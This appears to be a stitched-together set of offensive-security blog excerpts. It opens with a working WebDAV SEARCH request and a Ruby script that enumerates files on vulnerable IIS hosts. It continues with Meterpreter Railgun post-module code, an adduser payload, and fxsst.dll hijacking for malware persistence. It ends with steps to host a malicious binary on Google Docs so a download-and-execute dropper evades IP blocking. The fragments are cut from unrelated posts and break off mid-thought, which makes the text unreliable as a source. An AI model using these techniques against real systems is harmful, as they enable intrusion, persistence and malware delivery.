This: http://www.securityfocus.com/bid/1756 still works (on vulnerable hosts; it is an old vuln) and is very useful. Send this:

SEARCH / HTTP/1.1
Host: target
Content-Type: text/xml
Content-Length: 133

<?xml version="1.0"?>
<g:searchrequest xmlns:g="DAV:">
<g:sql>
Select "DAV:displayname" from scope()
</g:sql>
</g:searchrequest>

(The Content-Length of 133 assumes CRLF line endings in the body and no trailing newline; if you paste it with bare LF the count will be off and the server may hang waiting for the rest of the body.) And expect something like this back:
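The exchange above, as an added example that is not part of the original post: the request is built with the Content-Length computed from the body (so it stays correct if you edit the query), and the 207 Multi-Status reply is parsed for every DAV:displayname regardless of which namespace prefix the server picked. The SAMPLE_RESPONSE is a constructed multistatus body, not output captured from a real host, and the `Connection: close` header is an addition so the socket read terminates.

```ruby
require 'socket'
require 'rexml/document'

# Body of the WebDAV SEARCH request from the post (a DASL query for the
# DAV:displayname of every resource in scope).  Joined with CRLF, which is
# what makes the Content-Length come out to the 133 bytes shown above.
SEARCH_BODY = [
  '<?xml version="1.0"?>',
  '<g:searchrequest xmlns:g="DAV:">',
  '<g:sql>',
  'Select "DAV:displayname" from scope()',
  '</g:sql>',
  '</g:searchrequest>'
].join("\r\n")

# Build the full request.  Content-Length is derived from the body rather
# than hard-coded.  Connection: close is not in the post; it is here so a
# plain socket read returns once the server has finished.
def build_search_request(host, path = '/')
  headers = [
    "SEARCH #{path} HTTP/1.1",
    "Host: #{host}",
    'Content-Type: text/xml',
    "Content-Length: #{SEARCH_BODY.bytesize}",
    'Connection: close'
  ]
  headers.join("\r\n") + "\r\n\r\n" + SEARCH_BODY
end

# Extract every DAV:displayname from a multistatus body.  Servers use
# different prefixes (a:, D:, ...), so match on local name + namespace URI.
def parse_displaynames(xml)
  doc = REXML::Document.new(xml)
  names = []
  REXML::XPath.each(doc, '//*') do |el|
    next unless el.name == 'displayname' && el.namespace == 'DAV:'
    names << el.text.to_s.strip
  end
  names
end

# Send the request over plain TCP and return the parsed names.  For HTTPS
# targets wrap the socket in OpenSSL::SSL::SSLSocket first.
def search_displaynames(host, port = 80)
  sock = TCPSocket.new(host, port)
  sock.write(build_search_request(host))
  response = sock.read
  sock.close
  status, _, rest = response.partition("\r\n")
  _headers, _, body = rest.partition("\r\n\r\n")
  # A successful WebDAV SEARCH answers with 207 Multi-Status.
  raise "unexpected status line: #{status}" unless status =~ %r{\AHTTP/1\.[01] 207}
  parse_displaynames(body)
end

# Constructed sample of a 207 body (not captured from a real server), so the
# parser can be exercised offline.
SAMPLE_RESPONSE = <<~XML
  <?xml version="1.0"?>
  <a:multistatus xmlns:a="DAV:">
    <a:response><a:href>http://target/</a:href>
      <a:propstat><a:status>HTTP/1.1 200 OK</a:status>
        <a:prop><a:displayname>/</a:displayname></a:prop></a:propstat></a:response>
    <a:response><a:href>http://target/scripts/</a:href>
      <a:propstat><a:status>HTTP/1.1 200 OK</a:status>
        <a:prop><a:displayname>scripts</a:displayname></a:prop></a:propstat></a:response>
  </a:multistatus>
XML

if __FILE__ == $PROGRAM_NAME
  # Offline: show the request and parse the constructed sample.
  # Against a live host: puts search_displaynames('target')
  puts build_search_request('target')
  p parse_displaynames(SAMPLE_RESPONSE)
end
```

Run it with no arguments to see the exact bytes that go on the wire and the names pulled from the sample body; point `search_displaynames` at a host to run the real query.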
Update 1: No, this doesn’t need to be in memory since you control the system, but it was a fun challenge. Update 2: The info from the ‘adduser’ payload says ‘Create a new user and add them to local administration group’. I’m guessing that since I ran this on a DC is why I didn’t notice this, but it is something to keep in mind when running this script. Update 3: Here is a PowerShell way of doing things from a CSV; you can put the passwords in the CSV and keep it for reference too.
I saw a post back in June and it just recently came up again: http://www.securityartwork.es/2011/06/01/dns-port-forwarding-con-meterpreter/ It looked like a lot of hard work to set that up and I’m really lazy. I didn’t want to have to go through all that every time I got onto a new network. So, I made a very simple Meterpreter post module that just calls the Windows API function ‘gethostbyaddr’ using Railgun. TL;DR: You can download the post module here: ipresolver.
One important thing to note about Railgun is that you are calling the Windows API directly, and just as if you were writing C++, the function you are calling might not exist on the system you are calling it on. So here is a quick trick to find out whether the function (API) you want to call is available to you. For my example I’m using ‘getaddrinfo’ since its life in Windows is somewhat odd.
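One way to do that check, as an added example rather than the post's own code: ask the remote host's kernel32 for the export before calling it. This is the same pattern a post module like the ipresolver one above would use before calling gethostbyaddr. `api_available?` makes real Railgun calls (`client.railgun.kernel32.LoadLibraryA` / `GetProcAddress`, whose results come back as a hash with the function's return value under 'return'); `FakeRailgun` is a stand-in so the logic can be exercised without a session, and its module handles and export lists are made-up values.

```ruby
# Returns true if `func` is exported by `dll` on the host behind `railgun`
# (pass client.railgun from inside a Meterpreter post module).
def api_available?(railgun, dll, func)
  k32 = railgun.kernel32
  # LoadLibraryA also works for DLLs not yet mapped into the process;
  # a 0 handle means the DLL itself is missing.
  hmod = k32.LoadLibraryA(dll)['return']
  return false if hmod.nil? || hmod == 0
  # GetProcAddress returns 0 when the export does not exist.
  addr = k32.GetProcAddress(hmod, func)['return']
  !addr.nil? && addr != 0
end

# Offline stand-in for client.railgun.  Handles and export lists are
# invented for the demonstration; only the call/return shape mirrors Railgun.
class FakeRailgun
  # dll name => [fake HMODULE, exported function names]
  MODULES = {
    'ws2_32.dll'   => [0x71a10000, %w[gethostbyaddr getaddrinfo]],
    'kernel32.dll' => [0x7c800000, %w[GetTickCount GetProcAddress]]
  }.freeze

  class Kernel32
    def LoadLibraryA(name)
      hmod, = MODULES[name.downcase]
      # 126 is ERROR_MOD_NOT_FOUND
      { 'GetLastError' => hmod ? 0 : 126, 'return' => hmod || 0 }
    end

    def GetProcAddress(hmod, func)
      entry = MODULES.values.find { |h, _| h == hmod }
      found = entry && entry[1].include?(func)
      # 127 is ERROR_PROC_NOT_FOUND
      { 'GetLastError' => found ? 0 : 127, 'return' => found ? hmod + 0x1000 : 0 }
    end
  end

  def kernel32
    Kernel32.new
  end
end

if __FILE__ == $PROGRAM_NAME
  rg = FakeRailgun.new
  %w[gethostbyaddr getaddrinfo WSAPoll].each do |f|
    puts "ws2_32!#{f}: #{api_available?(rg, 'ws2_32.dll', f)}"
  end
  # In a post module: api_available?(client.railgun, 'ws2_32.dll', 'getaddrinfo')
end
```

In a module, guard the real call with this and fall back (or bail with a clear message) when it returns false; a Railgun call to a missing export otherwise fails on the target rather than in your Ruby.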
Also known as “How to practice what we preach”. I don’t know how long I’ve been telling clients that they need a minimum password length of 15 characters so that there is no chance an LM hash will be stored (with the side bonus that the new password won’t be close to the original). But I’ve never tried setting it myself. Well, a client called me out. You can’t! (Well, at least not through the UI.)
This series was interrupted a bit by the new Metasploit HTTP/HTTPS payloads (more info). Definitely not complaining, though, as the new features (as will be discussed in part 2) are some epic additions to the payload list. However, an important change happened while the craziness over the new payloads was going on: ScriptJunkie snuck in an awesome change to msfvenom (a.k.a. msffsm). Here is the link to the ticket about the change (link) and the revision (r13057).
I’ve been cracking passwords for a while and use a myriad of tools in a certain order to get the job done. I find that Cain is still my go-to for visualizing the process and doing some basic sorting (I really wish I could search in-app). I’ve been asking some questions on Twitter, like why GPU cracking of 50k hashes is faster than rainbow tables (most say the bottleneck is the HDD read pattern and speed), and many asked what all of my complaints are, so I figured this would be the best place (vice multiple emails).
I missed the 3-year anniversary of NoVA Hackers but I did want to make a post about it since we are still going strong and are now at ~150 active members. Chris Gates and I started this thing together back in October of 2008; it spawned off Chris’ idea to start an AHA (Austin Hackers Association)-like group in NoVA. Its ideals merged with the already-running NoVA Security Luncheons that I was throwing in Reston, VA and DC, and that was where it all started.
Nick Harbour wrote a post on Mandiant’s blog about some malware that was using a DLL called ‘fxsst.dll’ to hide and stay persistent on a system. The DLL is used by Windows when it is acting as a fax server (anyone still do that?). He mentions some very interesting points:
- The DLL gets loaded at login by Explorer.
- The DLL exists in System32 but is looked for in the Windows directory first (explorer.exe lives in %WINDIR%, and the application’s own directory is searched before System32).
- Explorer doesn’t try to use anything inside of it via exports unless the system is acting as a fax server (aka safe to put a pretty bland DLL there).
I thought… no, it couldn’t be that simple… let’s see:
In Part 1 I gave an example I used at CCDC with the single ‘windows/download_exec’ payload. One of the downsides of that payload is that you need to host the binary, giving up an IP/host that can be blocked. Well, Google recently (a couple of months ago) allowed people to upload ‘anything’ to Google Docs, and you can then share these files publicly. You probably already see where I’m going with this, but here are some steps to get it going. First, upload your malicious binary (not the dropper ‘windows/download_exec’, but the file it needs to execute).